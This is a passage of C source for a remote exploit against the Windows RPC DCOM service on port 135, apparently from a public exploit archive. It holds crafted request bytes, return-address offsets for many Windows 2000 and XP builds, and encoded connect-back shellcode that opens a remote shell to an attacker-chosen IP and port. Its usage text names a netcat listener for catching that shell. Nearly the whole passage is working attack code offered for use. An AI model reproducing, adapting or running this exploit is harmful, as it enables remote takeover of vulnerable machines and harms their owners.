,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



/* Myam add OFFSETS*/
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */





/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/ 
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"


"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


"\x38\x6e\x16\x76\x0d\x6e\x16\x76" 
//&#19979;&#38754;&#26159;SHELLCODE&#65292;&#21487;&#20197
//SHELLCODE&#19981;&#23384;&#22312;0X00&#65292;0X00&#19982;0X5C
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code 
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;


unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;


DWORD cb;



printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");


if(argc<5)
{

printf("[<$>] OC192 RPC Remote Windows Exploit\n");
printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
printf("[<$>] Thanks to LSD and XForce\n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 2 Win2k Spanish +sp4\n");
printf("[<$>] 3 Win2k English nosp 1\n");
printf("[<$>] 4 Win2k English nosp 2\n");
printf("[<$>] 5 Win2k English +sp1\n");
printf("[<$>] 6 Win2k English +sp2 1\n");
printf("[<$>] 7 Win2k English +sp2 2\n");
printf("[<$>] 8 Win2k English +sp3 1\n");
printf("[<$>] 9 Win2k English +sp3 2\n");
printf("[<$>] 10 Win2k English +sp4\n");
printf("[<$>] 11 Win2k China +sp3\n");
printf("[<$>] 12 Win2k China +sp4\n");
printf("[<$>] 13 Win2k German +sp3\n");
printf("[<$>] 14 Win2k Japanese +sp2\n");
printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 16 WinXP English +sp1 1\n");
printf("[<$>] 17 WinXP English +sp1 2\n");
printf("[<$>] 18 WinXP English +sp2\n");
exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}


their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);


if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}



if(atoi(argv[4])==0)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==1)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==2)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==3)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==15)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==16)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==17)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==18)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]); 
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

len=recv(sockfd,buf1,1000,NULL);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
return;
}
len=recv(sockfd,buf1,1024,NULL);

}


// milw0rm.com [2003-07-29]